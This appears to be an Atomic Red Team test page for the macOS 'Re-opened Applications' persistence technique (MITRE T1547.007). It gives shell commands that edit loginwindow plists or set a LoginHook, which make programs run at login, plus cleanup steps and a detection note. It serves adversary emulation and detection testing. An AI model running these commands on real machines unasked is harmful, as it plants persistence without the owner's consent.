# T1547.007 - Re-opened Applications
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

## Atomic Tests

### Atomic Test #1 - Copy in loginwindow.plist for Re-Opened ApplicationsCopy in new loginwindow.plist to launch Calculator.
**Supported Platforms:** macos#### Attack Commands: Run with `sh`
```sh
cp PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 1

#### Cleanup: 
```sh
rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Re-Opened Applications using LoginHookMac Defaults

[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo defaults write com.apple.loginwindow LoginHook /path/to/script
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 2

#### Cleanup: 
```sh
sudo defaults delete com.apple.loginwindow LoginHook
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login.
Note that the change may not result in the added Calculator program launching on next user login.
It may depend on which version of macOS you are running on.

**Supported Platforms:** macos
#### Dependencies:  Run with `bash`!
##### Description: compile C program

##### Check Prereq Commands:
```sh
if [ -f "/tmp/t1547007_append_exe" ]; then exit 0 ; else exit 1; fi

```
##### Get Prereq Commands:
```sh
cc PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m -o /tmp/t1547007_append_exe -framework Cocoa

```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
/tmp/t1547007_append_exe ${FILE} && echo after && plutil -p ${FILE}
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 3

#### Cleanup: 
```sh
rm -f /tmp/t1547007_append_exe
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
   exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
```

In [ ]:
Invoke-AtomicTest T1547.007 -TestNumbers 3 -Cleanup

## Detection
Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.